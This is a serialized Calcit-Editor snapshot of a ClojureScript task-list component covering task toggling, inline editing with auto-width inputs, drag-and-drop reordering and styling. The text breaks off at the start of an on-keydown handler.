|T $ {} (:text |:top) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1gXWq9ckCBW)
|j $ {}
:data $ {}
|T $ {} (:text |str) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1zm-cqqJRrb)
|j $ {}
:data $ {}
|T $ {} (:text |*) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SkIXbqqqyCBW)
|j $ {} (:text |idx) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ryDQWcc5JABb)
|r $ {} (:text |48) (:type :leaf) (:at 1518169265922) (:by |root) (:id |H1OX-q9qkCBb)
:type :expr
:at 1500452996813
:by nil
:id |H1uk1s_Iz
|r $ {} (:text ||px) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJ9XZ5ccJASW)
:type :expr
:at 1500452996813
:by nil
:id |r1Z7-959kAB-
:type :expr
:at 1500452996813
:by nil
:id |Hy1Q-959kRHb
|r $ {}
:data $ {}
|T $ {} (:text |:cursor) (:type :leaf) (:at 1519745339180) (:by |root) (:id |SkxWrKemOfleaf)
|j $ {} (:text |:move) (:type :leaf) (:at 1519745341885) (:by |root) (:id |ByE7SYgXuz)
:type :expr
:at 1519745337362
:by |root
:id |SkxWrKemOf
:type :expr
:at 1500452996813
:by nil
:id |B1af-c95yRSW
|x $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hk37W9q5J0B-)
|j $ {}
:data $ {}
|T $ {} (:text |:done?) (:type :leaf) (:at 1500452996813) (:by |root) (:id |By07bqqck0rW)
|j $ {} (:text |task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hyk4b9qqyAH-)
:type :expr
:at 1500452996813
:by nil
:id |Skp7WqcqyABb
|r $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJZVZq9c1RH-)
|r $ {}
:data $ {}
|T $ {} (:text |:opacity) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1UN-5c5JCBb)
|j $ {} (:text |0.4) (:type :leaf) (:at 1519749607266) (:by |root) (:id |ryPVbqc9J0BW)
:type :expr
:at 1500452996813
:by nil
:id |HJSNZc5q1Rrb
:type :expr
:at 1500452996813
:by nil
:id |B1lEbqc9JArb
:type :expr
:at 1500452996813
:by nil
:id |SJsXW5cckRrb
:type :expr
:at 1500452996813
:by nil
:id |rJFz-999JRBZ
:type :expr
:at 1500452996813
:by nil
:id |ByPzb9cq1ASb
|p $ {}
:data $ {}
|T $ {} (:text |:draggable) (:type :leaf) (:at 1518015579443) (:by |root) (:id |rJZw45O8Gleaf)
|j $ {} (:text |true) (:type :leaf) (:at 1518015580631) (:by |root) (:id |B1VPE9OUM)
:type :expr
:at 1518015576637
:by |root
:id |B1-uOhx7_G
|v $ {}
:data $ {}
|T $ {} (:text |:on-dragstart) (:type :leaf) (:at 1518015812073) (:by |root) (:id |r1qBr9uLMleaf)
|j $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1518015814070) (:by |root) (:id |r1aSS5OIf)
|j $ {}
:data $ {}
|T $ {} (:text |e) (:type :leaf) (:at 1518015814490) (:by |root) (:id |H1G0BSc_Uf)
|j $ {} (:text |d!) (:type :leaf) (:at 1518015815400) (:by |root) (:id |S1kLr5dLz)
:type :expr
:at 1518015814315
:by |root
:id |Sy70rHcdIf
|r $ {}
:data $ {}
|T $ {} (:text |let) (:type :leaf) (:at 1518015817362) (:by |root) (:id |HJxZLHcdUGleaf)
|j $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |event) (:type :leaf) (:at 1518015818890) (:by |root) (:id |B1V-LScdUz)
|j $ {}
:data $ {}
|T $ {} (:text |:event) (:type :leaf) (:at 1518015820361) (:by |root) (:id |r1XX8H5u8G)
|j $ {} (:text |e) (:type :leaf) (:at 1518015820593) (:by |root) (:id |SJrEUrqOUf)
:type :expr
:at 1518015819706
:by |root
:id |rJ48B5_IG
:type :expr
:at 1518015817977
:by |root
:id |B1XGIBqdLG
:type :expr
:at 1518015817663
:by |root
:id |HkMIBqdLf
|r $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1518015835862) (:by |root) (:id |HyZmDrqOIzleaf)
|j $ {} (:text |event) (:type :leaf) (:at 1518015836937) (:by |root) (:id |HJ-VDBcdUz)
|r $ {} (:text |.-dataTransfer) (:type :leaf) (:at 1518015841687) (:by |root) (:id |B1VBvr9uLG)
|v $ {}
:data $ {}
|T $ {} (:text |.!setData) (:type :leaf) (:at 1629053173188) (:by |Qr5ffqtY) (:id |Sye9PS5dIz)
|j $ {} (:text ||text) (:type :leaf) (:at 1518015854166) (:by |root) (:id |SklZdr5OUM)
|r $ {}
:data $ {}
|D $ {} (:text |:id) (:type :leaf) (:at 1518015859260) (:by |root) (:id |HkiOrquIz)
|T $ {} (:text |task) (:type :leaf) (:at 1518015855348) (:by |root) (:id |r1gLdr5u8z)
:type :expr
:at 1518015857778
:by |root
:id |BkqdH9_8z
:type :expr
:at 1518015848644
:by |root
:id |r1W_B9_8z
:type :expr
:at 1518015834966
:by |root
:id |HyZmDrqOIz
|t $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1519748140064) (:by |root) (:id |r1xfNNbmdzleaf)
|j $ {} (:text |event) (:type :leaf) (:at 1519748141445) (:by |root) (:id |SyfVVVZ7Oz)
|r $ {} (:text |.-dataTransfer) (:type :leaf) (:at 1519748146197) (:by |root) (:id |Sk8VN-QdG)
|v $ {}
:data $ {}
|T $ {} (:text |.!setDragImage) (:type :leaf) (:at 1629053174684) (:by |Qr5ffqtY) (:id |rJz5NE-7uz)
|b $ {}
:data $ {}
|j $ {} (:text |js/document.querySelector) (:type :leaf) (:at 1629053178392) (:by |Qr5ffqtY) (:id |B1VYSVZQuM)
|r $ {} (:text ||.transparent) (:type :leaf) (:at 1519748171970) (:by |root) (:id |Sy7k8E-Xdf)
:type :expr
:at 1519748157882
:by |root
:id |S1IHNW7_f
|j $ {} (:text |0) (:type :leaf) (:at 1519748155367) (:by |root) (:id |SyQMSV-muM)
|r $ {} (:text |0) (:type :leaf) (:at 1519748155590) (:by |root) (:id |rJgXB4Z7uM)
:type :expr
:at 1519748147055
:by |root
:id |Byej4V-XuG
:type :expr
:at 1519748138479
:by |root
:id |r1xfNNbmdz
|v $ {}
:data $ {}
|T $ {} (:text |d!) (:type :leaf) (:at 1518169504937) (:by |root) (:id |ryxvoa1sIzleaf)
|j $ {} (:text |:mark/dragging) (:type :leaf) (:at 1518169516011) (:by |root) (:id |HyZYjaJsLG)
|r $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1518169518786) (:by |root) (:id |r1L2Tyo8G)
|j $ {} (:text |task) (:type :leaf) (:at 1518169521191) (:by |root) (:id |Skt2pyoUz)
:type :expr
:at 1518169520345
:by |root
:id |B1d36ysLz
:type :expr
:at 1518169503021
:by |root
:id |ryxvoa1sIz
:type :expr
:at 1518015816810
:by |root
:id |HJxZLHcdUG
:type :expr
:at 1518015813155
:by |root
:id |SJepSS5_LG
:type :expr
:at 1518015809684
:by |root
:id |r1qBr9uLM
|w $ {}
:data $ {}
|T $ {} (:text |:on-dragend) (:type :leaf) (:at 1518169528760) (:by |root) (:id |BJlC26Jo8zleaf)
|j $ {}
:data $ {}
|D $ {} (:text |fn) (:type :leaf) (:at 1519749449858) (:by |root) (:id |BkMUKZXOM)
|L $ {}
:data $ {}
|T $ {} (:text |e) (:type :leaf) (:at 1519749451444) (:by |root) (:id |SJl7ItW7df)
|j $ {} (:text |d!) (:type :leaf) (:at 1519749452307) (:by |root) (:id |rkVLKWQ_G)
:type :expr
:at 1519749450214
:by |root
:id |H1QGLKW7Of
|T $ {}
:data $ {}
|T $ {} (:text |d!) (:type :leaf) (:at 1519749455072) (:by |root) (:id |ByGWppkoUf)
|r $ {} (:text |:mark/dragging) (:type :leaf) (:at 1518169516011) (:by |root) (:id |HyZYjaJsLG)
|v $ {} (:text |nil) (:type :leaf) (:at 1518169544788) (:by |root) (:id |BkbgApyiUf)
:type :expr
:at 1518169529075
:by |root
:id |SJ7-ppJo8z
|j $ {}
:data $ {}
|T $ {} (:text |d!) (:type :leaf) (:at 1519749455072) (:by |root) (:id |ByGWppkoUf)
|r $ {} (:text |:mark/dropping) (:type :leaf) (:at 1519749458623) (:by |root) (:id |HyZYjaJsLG)
|v $ {} (:text |nil) (:type :leaf) (:at 1518169544788) (:by |root) (:id |BkbgApyiUf)
:type :expr
:at 1518169529075
:by |root
:id |SJd8Y-7_f
:type :expr
:at 1519749449219
:by |root
:id |rJgW8K-muz
:type :expr
:at 1518169526254
:by |root
:id |BJlC26Jo8z
|x $ {}
:data $ {}
|T $ {} (:text |:on-dragover) (:type :leaf) (:at 1518015890564) (:by |root) (:id |B1eDcBcOLGleaf)
|j $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1518015891784) (:by |root) (:id |SJxs9H5OIz)
|j $ {}
:data $ {}
|T $ {} (:text |e) (:type :leaf) (:at 1518015892340) (:by |root) (:id |rJb2qrquLM)
|j $ {} (:text |d!) (:type :leaf) (:at 1518015893338) (:by |root) (:id |Sk435BcdLG)
:type :expr
:at 1518015892126
:by |root
:id |Hkf2crqdLM
|v $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1518017598556) (:by |root) (:id |HySS29OUGleaf)
|j $ {} (:text |e) (:type :leaf) (:at 1518017600129) (:by |root) (:id |S1ewBncuLz)
|r $ {} (:text |:event) (:type :leaf) (:at 1518017601083) (:by |root) (:id |ry-OSn5OIM)
|v $ {}
:data $ {}
|T $ {} (:text |.!preventDefault) (:type :leaf) (:at 1629053182288) (:by |Qr5ffqtY) (:id |HJwYB35OLf)
:type :expr
:at 1518017602601
:by |root
:id |S1jrhq_Lz
:type :expr
:at 1518017596767
:by |root
:id |HySS29OUG
:type :expr
:at 1518015891239
:by |root
:id |Skbj9HqdLf
:type :expr
:at 1518620647940
:by |root
:id |BJexl0Wwz
|y $ {}
:data $ {}
|T $ {} (:text |:on-drop) (:type :leaf) (:at 1519748210188) (:by |root) (:id |SkZghB5dLGleaf)
|j $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1518015914884) (:by |root) (:id |BkeM3H9uLz)
|j $ {}
:data $ {}
|T $ {} (:text |e) (:type :leaf) (:at 1518015916509) (:by |root) (:id |B1bQ2ScdUz)
|j $ {} (:text |d!) (:type :leaf) (:at 1518015917134) (:by |root) (:id |B1rhrqu8G)
:type :expr
:at 1518015915164
:by |root
:id |rkfm3SquIG
|r $ {}
:data $ {}
|D $ {} (:text |let) (:type :leaf) (:at 1519748472706) (:by |root) (:id |Sk-gKBWmOz)
|L $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |event) (:type :leaf) (:at 1519748475258) (:by |root) (:id |rkZ-YrbmuG)
|j $ {}
:data $ {}
|T $ {} (:text |:event) (:type :leaf) (:at 1519748476308) (:by |root) (:id |BJM7Yr-X_M)
|j $ {} (:text |e) (:type :leaf) (:at 1519748477202) (:by |root) (:id |HkBFBb7dM)
:type :expr
:at 1519748475622
:by |root
:id |HJVFHW7Of
:type :expr
:at 1519748473085
:by |root
:id |SyQ-tS-muf
:type :expr
:at 1519748472932
:by |root
:id |HyGbKHW7_f
|T $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1518017404663) (:by |root) (:id |Bk-4ts5OLfleaf)
|j $ {}
:data $ {}
|T $ {} (:text |not=) (:type :leaf) (:at 1518017408011) (:by |root) (:id |SJbHYjqd8G)
|j $ {} (:text |dragging-id) (:type :leaf) (:at 1518017411658) (:by |root) (:id |BJzOKoquLf)
|r $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1518017413431) (:by |root) (:id |BJ-2Ysc_If)
|j $ {} (:text |task) (:type :leaf) (:at 1518017414121) (:by |root) (:id |SySaKocOUf)
:type :expr
:at 1518017412896
:by |root
:id |B1ZatsquUf
:type :expr
:at 1518017404931
:by |root
:id |r1GHtjqdLM
|r $ {}
:data $ {}
|T $ {} (:text |do) (:type :leaf) (:at 1518017416024) (:by |root) (:id |Hkb1qocdIzleaf)
|j $ {}
:data $ {}
|T $ {} (:text |d!) (:type :leaf) (:at 1518021117300) (:by |root) (:id |rkWx5j9u8G)
|f $ {} (:text |:task/move) (:type :leaf) (:at 1519749104170) (:by |root) (:id |B1bUt_i_IM)
|l $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518020766404) (:by |root) (:id |rkLoOiOLG)
|j $ {} (:text |dragging-id) (:type :leaf) (:at 1518020769378) (:by |root) (:id |S1vo_i_8z)
|r $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1518020771427) (:by |root) (:id |Hy5jdoOUM)
|j $ {} (:text |task) (:type :leaf) (:at 1518020772286) (:by |root) (:id |B1hiOsO8M)
:type :expr
:at 1518020770218
:by |root
:id |HJg5sdi_Uf
:type :expr
:at 1518020766049
:by |root
:id |r1eIi_od8f
:type :expr
:at 1518017416265
:by |root
:id |Hyzxcjqd8z
:type :expr
:at 1518017415386
:by |root
:id |Hkb1qocdIz
:type :expr
:at 1518017404132
:by |root
:id |HJeB5gR-vz
:type :expr
:at 1519748471942
:by |root
:id |BJexYBWXOG
:type :expr
:at 1518015913974
:by |root
:id |ryZf2BcOLG
:type :expr
:at 1518015912224
:by |root
:id |SkZghB5dLG
:type :expr
:at 1500452996813
:by nil
:id |SyBG-59ckCBW
|r $ {}
:data $ {}
|T $ {} (:text |div) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJEI-9c5JCr-)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1U8Z955J0rW)
|j $ {}
:data $ {}
|T $ {} (:text |:style) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1dLb59qyABW)
|j $ {}
:data $ {}
|T $ {} (:text |merge) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hy9UWqqck0H-)
|j $ {} (:text |style-done) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1jIb5951ABZ)
|r $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1pI-9c510rW)
|j $ {}
:data $ {}
|T $ {} (:text |:done?) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hy1Dbqc9yRB-)
|j $ {} (:text |task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1gDbcq9kRr-)
:type :expr
:at 1500452996813
:by nil
:id |rJR8-95qkASb
|r $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJMDW5q5yAH-)
|j $ {}
:data $ {}
|T $ {} (:text |:transform) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rk4wW55qJRHW)
|j $ {} (:text "||scale(0.7)") (:type :leaf) (:at 1508174307378) (:by |root) (:id |BkSD-9ccyCBW)
:type :expr
:at 1500452996813
:by nil
:id |r1QvZ5qqkRBW
:type :expr
:at 1500452996813
:by nil
:id |Bkbvb9qqJRB-
:type :expr
:at 1500452996813
:by nil
:id |HynL-cqcy0Sb
:type :expr
:at 1500452996813
:by nil
:id |ByYU-99ckRBb
:type :expr
:at 1500452996813
:by nil
:id |rkwUZcc51CrW
|r $ {}
:data $ {}
|T $ {} (:text |:on-click) (:type :leaf) (:at 1514170085789) (:by |root) (:id |Syswb9c5JRSb)
|r $ {}
:data $ {}
|D $ {} (:text |fn) (:type :leaf) (:at 1629052132743) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|T $ {} (:text |e) (:type :leaf) (:at 1629052134781) (:by |Qr5ffqtY)
|j $ {} (:text |d!) (:type :leaf) (:at 1629052136443) (:by |Qr5ffqtY)
:type :expr
:at 1629052133473
:by |Qr5ffqtY
|T $ {}
:data $ {}
|T $ {} (:text |d!) (:type :leaf) (:at 1629052131472) (:by |Qr5ffqtY) (:id |BJL3-q5cyRSb)
|j $ {} (:text |:task/toggle) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ByD3-9q9yCSW)
|r $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1518022720060) (:by |root) (:id |rkd3Zqqq1AHW)
|j $ {} (:text |task) (:type :leaf) (:at 1518022721269) (:by |root) (:id |HybuBxhOLG)
:type :expr
:at 1518022718978
:by |root
:id |HJwSehuLM
:type :expr
:at 1500452996813
:by nil
:id |BkxWjf9d8f
:type :expr
:at 1629052131994
:by |Qr5ffqtY
:type :expr
:at 1500452996813
:by nil
:id |SyghkvJAMM
:type :expr
:at 1500452996813
:by nil
:id |BkH8bqccyCSZ
:type :expr
:at 1500452996813
:by nil
:id |HJmIW5ccyArZ
|v $ {}
:data $ {}
|T $ {} (:text |=<) (:type :leaf) (:at 1508038817659) (:by |root) (:id |BJeOZq951ASZ)
|j $ {} (:text |8) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1Zubq59kCHb)
|r $ {} (:text |nil) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ryf_bc9qJCHW)
:type :expr
:at 1500452996813
:by nil
:id |S1y_-95qy0H-
|x $ {}
:data $ {}
|T $ {} (:text |input) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJ4dZ9c9yArZ)
|j $ {}
:data $ {}
|yT $ {}
:data $ {}
|T $ {} (:text |:on-keydown) (:type :leaf) (:at 1514170099725) (:by |root) (:id |S1yjbq5910HZ)
|j $ {}
:data $ {}
|T $ {} (:text |on-keydown) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1Zj-5ccy0Bb)
|b $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1518020143507) (:by |root) (:id |HyrV8jOIf)
|j $ {} (:text |task) (:type :leaf) (:at 1518020144051) (:by |root) (:id |rkuNLjdIf)
:type :expr
:at 1518020142155
:by |root
:id |SJ8ELod8f
|j $ {}
:data $ {}
|T $ {} (:text |:text) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkXoZ5c9J0r-)
|j $ {} (:text |task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJEsbc9qJCHZ)
:type :expr
:at 1500452996813
:by nil
:id |SkfsWq9qyRr-
|r $ {} (:text |idx) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SkHjZ5c5JRSW)
:type :expr
:at 1500452996813
:by nil
:id |SkgsWq59yASb
:type :expr
:at 1500452996813
:by nil
:id |B1RcZ9c5kAHb
|yj $ {}
:data $ {}
|T $ {} (:text |:on-click) (:type :leaf) (:at 1514170101439) (:by |root) (:id |B1Pjbq9qkCHZ)
|j $ {}
:data $ {}
|D $ {} (:text |fn) (:type :leaf) (:at 1629052150168) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|T $ {} (:text |e) (:type :leaf) (:at 1629052150483) (:by |Qr5ffqtY)
|j $ {} (:text |d!) (:type :leaf) (:at 1629052152786) (:by |Qr5ffqtY)
:type :expr
:at 1629052151989
:by |Qr5ffqtY
|T $ {}
:data $ {}
|T $ {} (:text |d!) (:type :leaf) (:at 1629052147230) (:by |Qr5ffqtY) (:id |rk-yW5951CHb)
|j $ {} (:text |:pointer/touch) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Skz1b999kRSZ)
|r $ {} (:text |idx) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkQ1-q55y0S-)
:type :expr
:at 1500452996813
:by nil
:id |H1lohM9_8f
:type :expr
:at 1629052147896
:by |Qr5ffqtY
:type :expr
:at 1500452996813
:by nil
:id |S1Iobqq51AHZ
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJUu-q99yCBW)
|j $ {}
:data $ {}
|T $ {} (:text |:value) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkOu-c5q1RBW)
|j $ {}
:data $ {}
|T $ {} (:text |:text) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJ5_-c55JArW)
|j $ {} (:text |task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1o_b5qqk0rb)
:type :expr
:at 1500452996813
:by nil
:id |BJtd-9c5k0Sb
:type :expr
:at 1500452996813
:by nil
:id |rkPOZc9cy0rb
|r $ {}
:data $ {}
|T $ {} (:text |:placeholder) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Sy6_Wc55JRSW)
|j $ {} (:text ||task...) (:type :leaf) (:at 1519744927201) (:by |root) (:id |r1Adbq9ckRHZ)
:type :expr
:at 1500452996813
:by nil
:id |Skndb5cc10Sb
|v $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rygF-cqckASZ)
|j $ {}
:data $ {}
|T $ {} (:text |str) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1zYZqq91ABW)
|j $ {} (:text ||input-) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkXt-c99yRBZ)
|r $ {} (:text |idx) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ryVYZ59c1CrZ)
:type :expr
:at 1500452996813
:by nil
:id |BkZtbqqcJRrW
:type :expr
:at 1500452996813
:by nil
:id |HyJKb5c91AB-
|x $ {}
:data $ {}
|T $ {} (:text |:style) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Bk8YW99q1RrW)
|j $ {}
:data $ {}
|T $ {} (:text |merge) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HyuKbq5cJArZ)
|j $ {} (:text |ui/input) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkFYZ99c10SZ)
|r $ {} (:text |style-text) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rkqYb9q5yRS-)
|v $ {}
:data $ {}
|D $ {} (:text |let) (:type :leaf) (:at 1519746328090) (:by |root) (:id |HJgmaxmuz)
|L $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |text-width) (:type :leaf) (:at 1519746333487) (:by |root) (:id |r1QxXaeXuz)
|j $ {}
:data $ {}
|T $ {} (:text |get-width) (:type :leaf) (:at 1519746334617) (:by |root) (:id |BkLmTeQ_f)
|j $ {}
:data $ {}
|T $ {} (:text |:text) (:type :leaf) (:at 1519746337618) (:by |root) (:id |Sybv7TlmOM)
|j $ {} (:text |task) (:type :leaf) (:at 1519746338441) (:by |root) (:id |H1lc7al7dM)
:type :expr
:at 1519746336369
:by |root
:id |SkdXTxXdf
|n $ {} (:text ||Hind) (:type :leaf) (:at 1519746417660) (:by |root) (:id |BJOOaxm_M)
|r $ {} (:text |16) (:type :leaf) (:at 1519746342412) (:by |root) (:id |B1xs76x7df)
:type :expr
:at 1519746334877
:by |root
:id |rkeD7axQ_f
:type :expr
:at 1519746328467
:by |root
:id |BkrxQ6eQ_f
:type :expr
:at 1519746328320
:by |root
:id |SkEgmagmOG
|T $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1519746321200) (:by |root) (:id |SymfpxXdG)
|j $ {}
:data $ {}
|T $ {} (:text |:width) (:type :leaf) (:at 1519746322725) (:by |root) (:id |SJMtGTgQOz)
|j $ {}
:data $ {}
|D $ {} (:text |+) (:type :leaf) (:at 1519746429998) (:by |root) (:id |r1eSYTgXOz)
|L $ {} (:text |16) (:type :leaf) (:at 1519748808793) (:by |root) (:id |B1wFagXdz)
|T $ {} (:text |text-width) (:type :leaf) (:at 1519746354940) (:by |root) (:id |SkF4TlmuM)
:type :expr
:at 1519746428825
:by |root
:id |S1ZMRgQuz
:type :expr
:at 1519746321567
:by |root
:id |Sy9MalmOM
:type :expr
:at 1519746315723
:by |root
:id |rJEGTgQOf
:type :expr
:at 1519746327430
:by |root
:id |SJf1Qaxm_M
:type :expr
:at 1500452996813
:by nil
:id |BkPFb9991CBb
:type :expr
:at 1500452996813
:by nil
:id |HkBKb595yCrW
|y $ {}
:data $ {}
|T $ {} (:text |:on-input) (:type :leaf) (:at 1514170096615) (:by |root) (:id |HJl9b5c51ASW)
|j $ {}
:data $ {}
|D $ {} (:text |fn) (:type :leaf) (:at 1629052143793) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|T $ {} (:text |e) (:type :leaf) (:at 1629052144342) (:by |Qr5ffqtY)
|j $ {} (:text |d!) (:type :leaf) (:at 1629052144880) (:by |Qr5ffqtY)
:type :expr
:at 1629052144112
:by |Qr5ffqtY
|T $ {}
:data $ {}
|T $ {} (:text |d!) (:type :leaf) (:at 1629052141870) (:by |Qr5ffqtY) (:id |Byc3x59qkASW)
|j $ {} (:text |:task/edit) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Skihx9ccJCrZ)
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hk6ngq551ArZ)
|j $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1518019425403) (:by |root) (:id |S1A2ecqq1ArW)
|j $ {} (:text |task) (:type :leaf) (:at 1518019427381) (:by |root) (:id |S19DXjuIf)
:type :expr
:at 1518019425022
:by |root
:id |BktD7o_Lz
|r $ {}
:data $ {}
|T $ {} (:text |:value) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1gag9qqy0rb)
|j $ {} (:text |e) (:type :leaf) (:at 1629052204174) (:by |Qr5ffqtY) (:id |Sk-pxc5qkCHb)
:type :expr
:at 1500452996813
:by nil
:id |rk16e599k0BW
:type :expr
:at 1500452996813
:by nil
:id |Byn2l55cyRSW
:type :expr
:at 1500452996813
:by nil
:id |SJl0M5dUM
:type :expr
:at 1629052142430
:by |Qr5ffqtY
:type :expr
:at 1500452996813
:by nil
:id |rky9Z599kRr-
:type :expr
:at 1500452996813
:by nil
:id |B1BuW999k0Sb
:type :expr
:at 1500452996813
:by nil
:id |rJXub55ck0r-
|y $ {}
:data $ {}
|T $ {} (:text |<>) (:type :leaf) (:at 1553790274968) (:by |root) (:id |4EL0Ezy3Suleaf)
|j $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1553790288794) (:by |root) (:id |TGYSDnG0At)
|j $ {} (:text |task) (:type :leaf) (:at 1553790289761) (:by |root) (:id |Mi2useEARM)
:type :expr
:at 1553790275793
:by |root
:id |4mF2QBPuf
|r $ {} (:type :expr) (:by |Qr5ffqtY) (:at 1638686513825)
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1553790319135) (:by |root) (:id |E0vwIfsf4B)
|j $ {}
:data $ {}
|T $ {} (:text |:color) (:type :leaf) (:at 1553790320260) (:by |root) (:id |Ke_6uRzifH)
|j $ {}
:data $ {}
|T $ {} (:text |hsl) (:type :leaf) (:at 1553790322378) (:by |root) (:id |ykpLn658qc)
|j $ {} (:text |0) (:type :leaf) (:at 1553790323655) (:by |root) (:id |wbyolQmF-)
|r $ {} (:text |0) (:type :leaf) (:at 1553790324052) (:by |root) (:id |9yls61DTLF)
|v $ {} (:text |0) (:type :leaf) (:at 1553790324687) (:by |root) (:id |8uujC8hstu)
|x $ {} (:text |0.1) (:type :leaf) (:at 1631341719513) (:by |Qr5ffqtY) (:id |4cL3zIEmCW)
:type :expr
:at 1553790321473
:by |root
:id |v-ZWd3j_V6
:type :expr
:at 1553790319452
:by |root
:id |rs3RCK_gGj
:type :expr
:at 1553790312622
:by |root
:id |xoXyB8Zrk
|D $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686514697) (:text |merge)
|j $ {} (:type :expr) (:by |Qr5ffqtY) (:at 1638686528180)
:data $ {}
|T $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686528549) (:text |if)
|j $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686529729) (:text |demo?)
|r $ {} (:type :expr) (:by |Qr5ffqtY) (:at 1638686530227)
:data $ {}
|T $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686531503) (:text |{})
|j $ {} (:type :expr) (:by |Qr5ffqtY) (:at 1638686531909)
:data $ {}
|T $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686534732) (:text |:color)
|j $ {} (:type :expr) (:by |Qr5ffqtY) (:at 1638686534969)
:data $ {}
|T $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686535399) (:text |hsl)
|j $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686536032) (:text |0)
|r $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686536915) (:text |0)
|v $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686537475) (:text |0)
|x $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686584196) (:text |0.4)
|v $ {} (:type :expr) (:by |Qr5ffqtY) (:at 1638686574357)
:data $ {}
|T $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686576282) (:text |:font-size)
|j $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686591094) (:text |16)
|x $ {} (:type :expr) (:by |Qr5ffqtY) (:at 1638686591726)
:data $ {}
|T $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686596153) (:text |:font-family)
|j $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686601727) (:text |ui/font-code)
:type :expr
:at 1553790273161
:by |root
:id |4EL0Ezy3Su
:type :expr
:at 1500452996813
:by nil
:id |HkQzZ5c5yAHb
:type :expr
:at 1500452996813
:by nil
:id |ryiZWqc5k0r-
|on-keydown $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1tkG5q9JRHZ)
|j $ {} (:text |on-keydown) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1c1z9qqJCSZ)
|r $ {}
:data $ {}
